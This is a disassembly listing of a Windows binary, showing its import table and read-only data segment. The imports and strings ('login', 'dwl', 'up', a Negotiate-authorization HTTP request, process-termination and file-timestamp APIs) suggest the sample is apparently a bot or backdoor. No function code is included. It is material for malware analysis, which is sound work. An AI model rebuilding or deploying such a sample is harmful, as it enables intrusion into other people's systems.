extrn DeleteCriticalSection:dword ; CODE XREF: sub_405A2E+73�p
; sub_405A2E+2A7�p
; DATA XREF: ...
; BOOL __stdcall FindClose(HANDLE hFindFile)
extrn FindClose:dword ; CODE XREF: sub_405CF2+56�p
; DATA XREF: sub_405CF2+56�r
; HANDLE __stdcall FindFirstFileA(LPCSTR lpFileName, LPWIN32_FIND_DATAA lpFindFileData)
extrn FindFirstFileA:dword ; CODE XREF: sub_405CF2+36�p
; DATA XREF: sub_405CF2+36�r
; BOOL __stdcall DeleteFileA(LPCSTR lpFileName)
extrn DeleteFileA:dword ; CODE XREF: sub_405D52+2E9�p
; sub_405D52+50A�p ...
; BOOL __stdcall SetFileAttributesA(LPCSTR lpFileName, DWORD dwFileAttributes)
extrn SetFileAttributesA:dword ; CODE XREF: sub_405D52+2B1�p
; sub_405D52+4D2�p ...
; BOOL __stdcall TerminateProcess(HANDLE hProcess, UINT uExitCode)
extrn TerminateProcess:dword ; CODE XREF: sub_405D52+20B�p
; sub_405D52+42C�p ...
; HANDLE __stdcall OpenProcess(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId)
extrn OpenProcess:dword ; CODE XREF: sub_405D52+1F3�p
; sub_405D52+414�p ...
; int __stdcall lstrcmpiA(LPCSTR lpString1, LPCSTR lpString2)
extrn lstrcmpiA:dword ; CODE XREF: sub_405D52+14B�p
; sub_405D52+1C0�p ...
; UINT __stdcall GetWindowsDirectoryA(LPSTR lpBuffer, UINT uSize)
extrn GetWindowsDirectoryA:dword ; CODE XREF: sub_405D52+70�p
; sub_409C28+89�p ...
; UINT __stdcall GetSystemDirectoryA(LPSTR lpBuffer, UINT uSize)
extrn GetSystemDirectoryA:dword ; CODE XREF: sub_405D52+5E�p
; sub_408C2B+1FC�p
; DATA XREF: ...
; int __stdcall lstrcmpA(LPCSTR lpString1, LPCSTR lpString2)
extrn lstrcmpA:dword ; CODE XREF: sub_40634F+4CE�p
; sub_40634F+4F2�p ...
; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName)
extrn LoadLibraryA:dword ; CODE XREF: sub_407087+195�p
; sub_407087+548�p ...
; FARPROC __stdcall GetProcAddress(HMODULE hModule, LPCSTR lpProcName)
extrn GetProcAddress:dword ; CODE XREF: sub_407087+26�p
; sub_407087+39�p ...
; HMODULE __stdcall GetModuleHandleA(LPCSTR lpModuleName)
extrn GetModuleHandleA:dword ; CODE XREF: sub_407087+B�p
; sub_407087+2AE�p ...
; DWORD __stdcall FormatMessageA(DWORD dwFlags, LPCVOID lpSource, DWORD dwMessageId, DWORD dwLanguageId, LPSTR lpBuffer, DWORD nSize, va_list *Arguments)
extrn FormatMessageA:dword ; CODE XREF: sub_40834A+35�p
; DATA XREF: sub_40834A+35�r
; BOOL __stdcall UnmapViewOfFile(LPCVOID lpBaseAddress)
extrn UnmapViewOfFile:dword ; CODE XREF: sub_40840B+82�p
; DATA XREF: sub_40840B+82�r
; LPVOID __stdcall MapViewOfFile(HANDLE hFileMappingObject, DWORD dwDesiredAccess, DWORD dwFileOffsetHigh, DWORD dwFileOffsetLow, SIZE_T dwNumberOfBytesToMap)
extrn MapViewOfFile:dword ; CODE XREF: sub_40840B+45�p
; DATA XREF: sub_40840B+45�r
; HANDLE __stdcall CreateFileMappingA(HANDLE hFile, LPSECURITY_ATTRIBUTES lpFileMappingAttributes, DWORD flProtect, DWORD dwMaximumSizeHigh, DWORD dwMaximumSizeLow, LPCSTR lpName)
extrn CreateFileMappingA:dword ; CODE XREF: sub_40840B+2E�p
; DATA XREF: sub_40840B+2E�r
; BOOL __stdcall SetFileTime(HANDLE hFile, const FILETIME *lpCreationTime, const FILETIME *lpLastAccessTime, const FILETIME *lpLastWriteTime)
extrn SetFileTime:dword ; CODE XREF: sub_4084A5+C9�p
; DATA XREF: sub_4084A5+C9�r
; BOOL __stdcall GetFileTime(HANDLE hFile, LPFILETIME lpCreationTime, LPFILETIME lpLastAccessTime, LPFILETIME lpLastWriteTime)
extrn GetFileTime:dword ; CODE XREF: sub_4084A5+75�p
; DATA XREF: sub_4084A5+75�r
; BOOL __stdcall CreateProcessA(LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCSTR lpCurrentDirectory, LPSTARTUPINFOA lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation)
extrn CreateProcessA:dword ; CODE XREF: .text:00408610�p
; sub_408651+1C1�p ...
; DWORD __stdcall ExpandEnvironmentStringsA(LPCSTR lpSrc, LPSTR lpDst, DWORD nSize)
extrn ExpandEnvironmentStringsA:dword ; CODE XREF: sub_408651+195�p
; DATA XREF: sub_408651+195�r
; DWORD __stdcall GetTempPathA(DWORD nBufferLength, LPSTR lpBuffer)
extrn GetTempPathA:dword ; CODE XREF: sub_408651+34�p
; sub_40ABFE+3AD7�p
; DATA XREF: ...
; void __stdcall GlobalMemoryStatus(LPMEMORYSTATUS lpBuffer)
extrn GlobalMemoryStatus:dword ; CODE XREF: sub_408C2B+256�p
; DATA XREF: sub_408C2B+256�r
; int __stdcall GetTimeFormatA(LCID Locale, DWORD dwFlags, const SYSTEMTIME *lpTime, LPCSTR lpFormat, LPSTR lpTimeStr, int cchTime)
extrn GetTimeFormatA:dword ; CODE XREF: sub_408C2B+236�p
; DATA XREF: sub_408C2B+236�r
; int __stdcall GetDateFormatA(LCID Locale, DWORD dwFlags, const SYSTEMTIME *lpDate, LPCSTR lpFormat, LPSTR lpDateStr, int cchDate)
extrn GetDateFormatA:dword ; CODE XREF: sub_408C2B+219�p
; DATA XREF: sub_408C2B+219�r
; BOOL __stdcall GetVersionExA(LPOSVERSIONINFOA lpVersionInformation)
extrn GetVersionExA:dword ; CODE XREF: sub_408C2B+25�p
; .text:0040FBA9�p
; DATA XREF: ...
; void __stdcall GetLocalTime(LPSYSTEMTIME lpSystemTime)
extrn GetLocalTime:dword ; CODE XREF: sub_40913D+A�p _time+D�p
; DATA XREF: ...
; void __stdcall ExitProcess(UINT uExitCode)
extrn ExitProcess:dword ; CODE XREF: sub_4095D3+554�p
; sub_409C28+110�p ...
; DWORD __stdcall GetCurrentProcessId()
extrn GetCurrentProcessId:dword ; CODE XREF: WinMain(x,x,x,x)+2EB�p
; DATA XREF: WinMain(x,x,x,x)+2EB�r
; BOOL __stdcall CopyFileA(LPCSTR lpExistingFileName, LPCSTR lpNewFileName, BOOL bFailIfExists)
extrn CopyFileA:dword ; CODE XREF: WinMain(x,x,x,x)+237�p
; DATA XREF: WinMain(x,x,x,x)+237�r
; DWORD __stdcall WaitForSingleObject(HANDLE hHandle, DWORD dwMilliseconds)
extrn WaitForSingleObject:dword ; CODE XREF: WinMain(x,x,x,x)+89�p
; WinMain(x,x,x,x)+3BA�p
; DATA XREF: ...
; HANDLE __stdcall CreateMutexA(LPSECURITY_ATTRIBUTES lpMutexAttributes, BOOL bInitialOwner, LPCSTR lpName)
extrn CreateMutexA:dword ; CODE XREF: WinMain(x,x,x,x)+82�p
; DATA XREF: WinMain(x,x,x,x)+82�r
; HANDLE __stdcall GetCurrentProcess()
extrn GetCurrentProcess:dword ; CODE XREF: sub_40F515+10�p
; _doexit+10�p
; DATA XREF: ...
; BOOL __stdcall GetComputerNameA(LPSTR lpBuffer, LPDWORD nSize)
extrn GetComputerNameA:dword ; CODE XREF: .text:0040FA43�p
; DATA XREF: .text:0040FA43�r
; int __stdcall GetLocaleInfoA(LCID Locale, LCTYPE LCType, LPSTR lpLCData, int cchData)
extrn GetLocaleInfoA:dword ; CODE XREF: .text:0040FB25�p
; .text:0040FD38�p
; DATA XREF: ...
; BOOL __stdcall TerminateThread(HANDLE hThread, DWORD dwExitCode)
extrn TerminateThread:dword ; CODE XREF: sub_4103E7+30�p
; DATA XREF: sub_4103E7+30�r
; LPVOID __stdcall HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes)
extrn HeapAlloc:dword ; CODE XREF: __heap_alloc+2E�p
; ___sbh_heap_init+D�p ...
; BOOL __stdcall HeapFree(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem)
extrn HeapFree:dword ; CODE XREF: _free+27�p
; ___sbh_free_block+2C4�p ...
extrn __imp_RtlUnwind:dword ; DATA XREF: RtlUnwind�r
; DWORD __stdcall GetTimeZoneInformation(LPTIME_ZONE_INFORMATION lpTimeZoneInformation)
extrn GetTimeZoneInformation:dword ; CODE XREF: _time+6C�p
; __tzset+38�p
; DATA XREF: ...
; void __stdcall GetSystemTime(LPSYSTEMTIME lpSystemTime)
extrn GetSystemTime:dword ; CODE XREF: _time+17�p
; DATA XREF: _time+17�r
; void __stdcall GetStartupInfoA(LPSTARTUPINFOA lpStartupInfo)
extrn GetStartupInfoA:dword ; CODE XREF: start+9F�p
; __ioinit+59�p
; DATA XREF: ...
; LPSTR __stdcall GetCommandLineA()
extrn GetCommandLineA:dword ; CODE XREF: start+74�p
; DATA XREF: start+74�r
; DWORD __stdcall GetVersion()
extrn GetVersion:dword ; CODE XREF: start+26�p
; DATA XREF: start+26�r
; BOOL __stdcall HeapDestroy(HANDLE hHeap)
extrn HeapDestroy:dword ; CODE XREF: __heap_init+2F�p
; DATA XREF: __heap_init+2F�r
; HANDLE __stdcall HeapCreate(DWORD flOptions, SIZE_T dwInitialSize, SIZE_T dwMaximumSize)
extrn HeapCreate:dword ; CODE XREF: __heap_init+11�p
; DATA XREF: __heap_init+11�r
; BOOL __stdcall VirtualFree(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType)
extrn VirtualFree:dword ; CODE XREF: ___sbh_free_block+257�p
; ___sbh_free_block+2B2�p
; DATA XREF: ...
; LPVOID __stdcall VirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)
extrn VirtualAlloc:dword ; CODE XREF: ___sbh_alloc_new_region+76�p
; ___sbh_alloc_new_group+51�p
; DATA XREF: ...
; LPVOID __stdcall HeapReAlloc(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem, SIZE_T dwBytes)
extrn HeapReAlloc:dword ; CODE XREF: ___sbh_alloc_new_region+28�p
; _realloc+F0�p
; DATA XREF: ...
; BOOL __stdcall IsBadWritePtr(LPVOID lp, UINT_PTR ucb)
extrn IsBadWritePtr:dword ; CODE XREF: _ValidateWrite(void *,uint)+C�p
; DATA XREF: _ValidateWrite(void *,uint)+C�r
; void __stdcall RaiseException(DWORD dwExceptionCode, DWORD dwExceptionFlags, DWORD nNumberOfArguments, const ULONG_PTR *lpArguments)
extrn RaiseException:dword ; CODE XREF: __raise_exc+215�p
; _CxxThrowException(x,x)+2E�p
; DATA XREF: ...
; SIZE_T __stdcall HeapSize(HANDLE hHeap, DWORD dwFlags, LPCVOID lpMem)
extrn HeapSize:dword ; CODE XREF: __msize+21�p
; DATA XREF: __msize+21�r
; UINT __stdcall SetHandleCount(UINT uNumber)
extrn SetHandleCount:dword ; CODE XREF: __ioinit+19D�p
; DATA XREF: __ioinit+19D�r
; HANDLE __stdcall GetStdHandle(DWORD nStdHandle)
extrn GetStdHandle:dword ; CODE XREF: __ioinit+158�p
; __NMSG_WRITE+143�p
; DATA XREF: ...
; DWORD __stdcall GetFileType(HANDLE hFile)
extrn GetFileType:dword ; CODE XREF: __ioinit+FF�p
; __ioinit+166�p ...
; DWORD __stdcall SetFilePointer(HANDLE hFile, LONG lDistanceToMove, PLONG lpDistanceToMoveHigh, DWORD dwMoveMethod)
extrn SetFilePointer:dword ; CODE XREF: __lseek+4F�p
; DATA XREF: __lseek+4F�r
; int __stdcall WideCharToMultiByte(UINT CodePage, DWORD dwFlags, LPCWSTR lpWideCharStr, int cchWideChar, LPSTR lpMultiByteStr, int cbMultiByte, LPCSTR lpDefaultChar, LPBOOL lpUsedDefaultChar)
extrn WideCharToMultiByte:dword ; CODE XREF: ___crtLCMapStringA+20D�p
; ___crtGetEnvironmentStringsA+93�p ...
; int __stdcall LCMapStringA(LCID Locale, DWORD dwMapFlags, LPCSTR lpSrcStr, int cchSrc, LPSTR lpDestStr, int cchDest)
extrn LCMapStringA:dword ; CODE XREF: ___crtLCMapStringA+5E�p
; ___crtLCMapStringA+A7�p
; DATA XREF: ...
;
; Imports from WS2_32.DLL
;
; char *__stdcall inet_ntoa(struct in_addr in)
extrn inet_ntoa:dword ; CODE XREF: sub_40ABFE+4605�p
; DATA XREF: sub_40ABFE+4605�r
; int __stdcall sendto(SOCKET s, const char *buf, int len, int flags, const struct sockaddr *to, int tolen)
extrn sendto:dword ; CODE XREF: sub_406B0C+43D�p
; DATA XREF: sub_406B0C+43D�r
; int __stdcall getsockname(SOCKET s, struct sockaddr *name, int *namelen)
extrn getsockname:dword ; CODE XREF: sub_40634F+3DA�p
; sub_406B0C+308�p ...
; u_long __stdcall htonl(u_long hostlong)
extrn htonl:dword ; CODE XREF: sub_40634F+4B6�p
; DATA XREF: sub_40634F+4B6�r
; int __stdcall WSAGetLastError()
extrn WSAGetLastError:dword ; CODE XREF: sub_40634F+693�p
; sub_406B0C+457�p
; DATA XREF: ...
; unsigned __int32 __stdcall inet_addr(const char *cp)
extrn inet_addr:dword ; CODE XREF: sub_404498+35�p
; sub_40634F+27F�p ...
; int __stdcall connect(SOCKET s, const struct sockaddr *name, int namelen)
extrn connect:dword ; CODE XREF: sub_404498+57�p
; DATA XREF: sub_404498+57�r
; int __stdcall WSACleanup()
extrn WSACleanup:dword ; CODE XREF: sub_404498+6E�p
; sub_404515+16C�p
; DATA XREF: ...
; int __stdcall WSAStartup(WORD wVersionRequested, LPWSADATA lpWSAData)
extrn WSAStartup:dword ; CODE XREF: sub_403C1E+62�p
; sub_404498+15�p
; DATA XREF: ...
; int __stdcall setsockopt(SOCKET s, int level, int optname, const char *optval, int optlen)
extrn setsockopt:dword ; CODE XREF: sub_403C1E+9B�p
; sub_40634F+1F9�p ...
; int __stdcall ioctlsocket(SOCKET s, __int32 cmd, u_long *argp)
extrn ioctlsocket:dword ; CODE XREF: sub_403C1E+B3�p
; DATA XREF: sub_403C1E+B3�r
; u_short __stdcall htons(u_short hostshort)
extrn htons:dword ; CODE XREF: sub_403C1E+D0�p
; sub_404498+41�p ...
; int __stdcall bind(SOCKET s, const struct sockaddr *name, int namelen)
extrn bind:dword ; CODE XREF: sub_403C1E+EC�p
; DATA XREF: sub_403C1E+EC�r
; int __stdcall listen(SOCKET s, int backlog)
extrn listen:dword ; CODE XREF: sub_403C1E+106�p
; DATA XREF: sub_403C1E+106�r
; SOCKET __stdcall accept(SOCKET s, struct sockaddr *addr, int *addrlen)
extrn accept:dword ; CODE XREF: sub_403C1E+26E�p
; DATA XREF: sub_403C1E+26E�r
; int __stdcall recv(SOCKET s, char *buf, int len, int flags)
extrn recv:dword ; CODE XREF: sub_403C1E+346�p
; DATA XREF: sub_403C1E+346�r
; int __stdcall closesocket(SOCKET s)
extrn closesocket:dword ; CODE XREF: sub_403C1E+3F1�p
; sub_404498+68�p ...
; SOCKET __stdcall socket(int af, int type, int protocol)
extrn socket:dword ; CODE XREF: .text:00402A94�p
; sub_403C1E+79�p ...
; int __stdcall send(SOCKET s, const char *buf, int len, int flags)
extrn send:dword ; CODE XREF: sub_4025FE+12�p
; sub_403C1E+32A�p ...
; int __stdcall select(int nfds, fd_set *readfds, fd_set *writefds, fd_set *exceptfds, const struct timeval *timeout)
extrn select:dword ; CODE XREF: sub_40227D+12C�p
; sub_403C1E+1C3�p
; DATA XREF: ...
; int __stdcall __WSAFDIsSet(SOCKET fd, fd_set *)
extrn __imp___WSAFDIsSet:dword ; DATA XREF: __WSAFDIsSet�r
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 41C1D4h
align 8
; char aGetHttp1_0Host[]
aGetHttp1_0Host db 'GET / HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_40288F+8E�o
db 'Host: %s',0Dh,0Ah
db 'Authorization: Negotiate %s',0Dh,0Ah
db 0Dh,0Ah,0
align 8
dbl_41C218 dq 7.2e1 ; DATA XREF: sub_40265D+41�r
dbl_41C220 dq 6.0 ; DATA XREF: sub_40265D+16�r
; sub_4026C9+82�r
dbl_41C228 dq 8.0 ; DATA XREF: sub_4026C9+7C�r
dword_41C230 dd 0FFFFFFFFh ; sub_402D44+B�r ...
dword_41C234 dd 0 ; sub_41AF6B+7�o
dbl_41C238 dq 1.024e3 ; DATA XREF: sub_4095D3+347�r
; sub_4095D3+372�r ...
; char aLogin[]
aLogin db 'login',0 ; DATA XREF: sub_40ABFE+BF8�o
align 4
; char aFakju[]
aFakju db 'fakju',0 ; DATA XREF: sub_40ABFE+221B�o
align 10h
; char aUp[]
aUp db 'up',0 ; DATA XREF: sub_40ABFE+3A96�o
align 4
; char aDwl[]
aDwl db 'dwl',0 ; DATA XREF: sub_40ABFE+406A�o
; __output+4A�r
dbl_41C258 dq 3.2768e4 ; DATA XREF: .text:0040F92E�r
dbl_41C260 dq 1.0 ; DATA XREF: _floor+6C�r _ceil+6C�r ...
dword_41C268 dd 0FFFFFFFFh, 412E33h, 412E47hbyte_41C274 db 6 ; DATA XREF: __output:loc_413B9D�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38282000h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
db 8,'`h````',0
dd 78707000h, 8787878h, 807h, 8080007h, 8000008h, 7000800h
dd 8
aNull_0: ; DATA XREF: .data:off_423A84�o
unicode 0, <(null)>,0
align 10h
aNull db '(null)',0 ; DATA XREF: .data:off_423A80�o
align 4
a_yn db '_yn',0
a_y1 db '_y1',0
a_y0 db '_y0',0
aFrexp db 'frexp',0
align 4
aFmod db 'fmod',0
align 4
a_hypot db '_hypot',0
align 4
a_cabs db '_cabs',0
align 4
aLdexp db 'ldexp',0
align 4
aModf db 'modf',0
align 4
aFabs db 'fabs',0
align 4
aFloor db 'floor',0
align 4
aCeil db 'ceil',0
align 4
aTan db 'tan',0
aCos db 'cos',0
aSin db 'sin',0
aSqrt db 'sqrt',0
align 10h
aAtan2 db 'atan2',0
align 4
aAtan db 'atan',0
align 10h
aAcos db 'acos',0
align 4
aAsin db 'asin',0
align 10h
aTanh db 'tanh',0
align 4
aCosh db 'cosh',0
align 10h
aSinh db 'sinh',0
align 4
aLog10 db 'log10',0
align 10h
aLog db 'log',0
aPow db 'pow',0
aExp_2 db 'exp',0 ; DATA XREF: .data:off_423A8C�o
align 10h
dbl_41C3A0 dq 0.0 ; DATA XREF: __handle_exc+8C�r
; __handle_exc+AC�r ...
dbl_41C3A8 dq 4.195835e6 ; DATA XREF: __ms_p5_test_fdiv+F�r
dbl_41C3B0 dq 3.145727e6 ; DATA XREF: __ms_p5_test_fdiv+6�r
; char aIsprocessorfea[]
aIsprocessorfea db 'IsProcessorFeaturePresent',0 ; DATA XREF: __ms_p5_mp_test_fdiv+F�o
align 4
; char aKernel32[]
aKernel32 db 'KERNEL32',0 ; DATA XREF: __ms_p5_mp_test_fdiv�o
align 10h
; char aE000[]
aE000 db 'e+000',0 ; DATA XREF: __cftoe+93�o
align 4
dword_41C3E8 dd 0FFFFFFFFh, 415453h, 41545Dh, 0dword_41C3F8 dd 0FFFFFFFFh, 0 dd offset sub_4155D9
align 8
dd offset sub_4155B7
dd offset sub_4155C1
dword_41C410 dd 0FFFFFFFFh, 415809h, 41580Dh, 0
; DATA XREF: BuildCatchObject(EHExceptionRecord *,EHRegistrationNode *,_s_HandlerType const *,_s_CatchableType const *)+5�o
dword_41C420 dd 0FFFFFFFFh, 41586Bh, 415874h, 0dword_41C430 dd 0FFFFFFFFh, 0 dd offset loc_41593D
align 10h
dd offset loc_415929
dd offset loc_41592D
dword_41C448 dd 0FFFFFFFFh, 0 dd offset loc_415993
align 8
dd offset loc_41597F
dd offset loc_415983
; char String1[]
String1 db 4 dup(0) ; DATA XREF: ___crtLCMapStringA+57�o
; ___crtGetStringTypeA+52�o ...
; const WCHAR SrcStr
SrcStr dw 0 ; DATA XREF: ___crtLCMapStringA+36�o
; ___crtGetStringTypeA+39�o ...
align 4
dword_41C468 dd 0FFFFFFFFh, 4171CEh, 4171D2h, 0FFFFFFFFh, 417282h, 417286h
; DATA XREF: ___crtLCMapStringA+5�o
dd 746E7572h, 20656D69h, 6F727265h, 2072h, 0A0Dh, 534F4C54h
dd 72652053h, 0D726F72h, 0Ah, 474E4953h, 72726520h, 0A0D726Fh
dd 0
aDomainError db 'DOMAIN error',0Dh,0Ah,0
align 4
aR6028UnableToI db 'R6028',0Dh,0Ah
db '- unable to initialize heap',0Dh,0Ah,0
align 4
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aAbnormalProgra db 0Dh,0Ah
db 'abnormal program termination',0Dh,0Ah,0
align 4
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 4
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .data:off_423F7C�o
db '- floating point not loaded',0Dh,0Ah,0
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: __NMSG_WRITE+119�o
align 4
; char asc_41C734[]
asc_41C734 db 0Ah ; DATA XREF: __NMSG_WRITE+F1�o
db 0Ah,0
align 4
; char aRuntimeErrorPr[]
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: __NMSG_WRITE+D3�o
db 0Ah
db 'Program: ',0
align 4
; char a___[]
a___ db '...',0 ; DATA XREF: __NMSG_WRITE+BF�o
; char aProgramNameUnk[]
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: __NMSG_WRITE+7D�o
align 10h
dword_41C770 dd 0FFFFFFFFh, 418BE3h, 418BE7haSunmontuewedth db 'SunMonTueWedThuFriSat',0
align 4
aJanfebmaraprma db 'JanFebMarAprMayJunJulAugSepOctNovDec',0
align 4
; char VarName[]
VarName db 'TZ',0 ; DATA XREF: __tzset+A�o
align 10h
; char aGetlastactivep[]
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: ___crtMessageBoxA+3D�o
align 4
; char aGetactivewindo[]
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: ___crtMessageBoxA+35�o
; char aMessageboxa[]
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: ___crtMessageBoxA+24�o
; char aUser32_dll_0[]
aUser32_dll_0 db 'user32.dll',0 ; DATA XREF: ___crtMessageBoxA+D�o
align 4
; char a1Qnan[]
a1Qnan db '1#QNAN',0 ; DATA XREF: _$I10_OUTPUT:loc_41A15D�o
align 4
; char a1Inf[]
a1Inf db '1#INF',0 ; DATA XREF: _$I10_OUTPUT+D8�o
align 4
a1Ind db '1#IND',0 ; DATA XREF: _$I10_OUTPUT+C7�o
align 4
a1Snan db '1#SNAN',0 ; DATA XREF: _$I10_OUTPUT+AD�o
align 10h
dword_41C820 dd 0FFFFFFFFh, 41ABA6h, 41ABAAh, 0FFFFFFFFh, 41AC15h, 41AC19h
; DATA XREF: ___crtCompareStringA+5�o
dd 41C92Ch
off_41C83C dd offset sub_41AF78 ; DATA XREF: sub_41AF50+8�o
; sub_41AF94+2C�o ...
dd offset sub_41AF6B ; ?what@runtime_error@@UBEPBDXZ
; doubtful name
dd offset sub_41B16C
dd offset dword_41C978
off_41C84C dd offset sub_41AFE2 ; DATA XREF: sub_41AF94+3A�o
; sub_41AFFE�o ...
dd offset sub_41AF6B ; ?what@runtime_error@@UBEPBDXZ
; doubtful name
dd offset loc_41B1A8
dword_41C858 dd 0 ; sub_41B046+16�o
aInvalidStringP db 'invalid string position',0 ; DATA XREF: sub_41B009+11�o
dd offset dword_41C9C4
off_41C878 dd offset sub_41B0D1 ; DATA XREF: sub_41B0ED�o
; sub_41B110+37�o ...
dd offset sub_41AF6B ; ?what@runtime_error@@UBEPBDXZ
; doubtful name
dd offset loc_41B18A
aStringTooLong db 'string too long',0 ; DATA XREF: sub_41B110+11�o
dd offset dword_41CA08
off_41C898 dd offset ??_Gtype_info@@UAEPAXI@Z ; DATA XREF: type_info::~type_info(void)�o
; .data:off_424804�o ...
; type_info::`scalar deleting destructor'(uint)
dd offset dword_41CA38
off_41C8A0 dd offset sub_41B203 ; DATA XREF: exception::exception(char const * const &)+8�o
; exception::exception(exception const &)+8�o ...
dd offset unknown_libname_9 ; Microsoft VisualC 2-8/net runtime
aUnknownExcepti db 'Unknown exception',0 ; DATA XREF: unknown_libname_9+7�o
align 10h
dword_41C8C0 dd 0E06D7363h, 1, 2 dup(0) dd 3, 19930520h, 2 dup(0)
off_41C8E0 dd offset off_424804 ; DATA XREF: .rdata:0041C914�o
; .rdata:0041C960�o ...
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
off_41C8F8 dd offset off_42481C ; DATA XREF: .rdata:0041C910�o
; .rdata:0041C95C�o ...
dd 1, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_41C8F8
dd offset off_41C8E0
dword_41C918 dd 3 dup(0) dd 2, 41C910h, 3 dup(0)
dd offset off_42481C
dd offset dword_41C918+4
off_41C940 dd offset off_42483C ; DATA XREF: .rdata:0041C958�o
dd 2, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_41C940
dd offset off_41C8F8
dd offset off_41C8E0
dd 0
db 0 ; DATA XREF: .rdata:0041C988�o
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dd 3, 41C958h
dword_41C978 dd 3 dup(0) dd offset off_42483C
dd offset unk_41C968
off_41C98C dd offset off_42485C ; DATA XREF: .rdata:0041C9A4�o
dd 2, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_41C98C
dd offset off_41C8F8
dd offset off_41C8E0
dword_41C9B0 dd 3 dup(0) dd 3, 41C9A4h
dword_41C9C4 dd 3 dup(0) dd offset off_42485C
dd offset dword_41C9B0+4
off_41C9D8 dd offset off_424880 ; DATA XREF: .rdata:0041C9F0�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_41C9D8
dd 0
db 0 ; DATA XREF: .rdata:0041CA18�o
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dd 1, 41C9F0h
dword_41CA08 dd 3 dup(0) dd offset off_424880
dd offset unk_41C9F8
dd offset off_41C8E0
dword_41CA20 dd 4 dup(0) dd 1, 41CA1Ch
dword_41CA38 dd 3 dup(0) dd offset off_424804
dd offset dword_41CA20+8
align 10h
stru_41CA50 dd 19930520h ; Magic ; DATA XREF: .text:loc_41B324�o
dd 2 ; Count
dd offset stru_41CA50.Info; InfoPtr
dd 0 ; CountDtr
dd 0 ; DtrPtr
dd 3 dup(0) ; _unk
dd -1 ; Info.Id
dd offset sub_41B30D ; Info.Proc
dd 0 ; Info.Id
dd offset sub_41B304 ; Info.Proc
stru_41CA80 dd 19930520h ; Magic ; DATA XREF: sub_41B340�o
dd 2 ; Count
dd offset stru_41CA80.Info; InfoPtr
dd 0 ; CountDtr
dd 0 ; DtrPtr
dd 3 dup(0) ; _unk
dd -1 ; Info.Id
dd offset sub_41B32E ; Info.Proc
dd 0 ; Info.Id
dd offset sub_41B337 ; Info.Proc
stru_41CAB0 dd 19930520h ; Magic ; DATA XREF: sub_41B34C�o
dd 2 ; Count
dd offset stru_41CAB0.Info; InfoPtr
dd 1 ; CountDtr
dd offset stru_41CAE0 ; DtrPtr
dd 3 dup(0) ; _unk
dd -1 ; Info.Id
dd 0 ; Info.Proc
dd -1 ; Info.Id
dd 0 ; Info.Proc
stru_41CAE0 dd 0, 0, 1 ; _unk ; DATA XREF: .rdata:stru_41CAB0�o
dd 1 ; Count
dd offset stru_41CAF8 ; RttiBlkPtr
dd 0
stru_41CAF8 _msRttiDscr <0, 0, 0, offset loc_40339B> ; DATA XREF: .rdata:stru_41CAE0�o
stru_41CB08 _msExcInfo <-1, offset sub_41B356> ; DATA XREF: .rdata:stru_41CB10�o
stru_41CB10 _msExcept7 <19930520h, 1, offset stru_41CB08, 0, 0, 0>
; DATA XREF: .text:loc_41B35E�o
align 10h
dd offset off_424804
align 8
dd 0FFFFFFFFh, 0
dd 0Ch, 41B25Ch, 0
dd offset off_42481C
dd 0
dd 0FFFFFFFFh, 0
dd 1Ch, 41B08Eh, 0
dd offset off_42483C
align 10h
dd 0FFFFFFFFh, 0
dword_41CB78 dd 1Ch, 41B0F8h, 3, 41CB64h, 41CB48h, 41CB2Chdword_41CB90 dd 0 ; sub_41B16C+4B�o
dd offset sub_41AFFE
dd 0
dd offset dword_41CB78+8
stru_41CBA0 _msExcInfo <-1, offset sub_41B368> ; DATA XREF: .rdata:stru_41CBA8�o
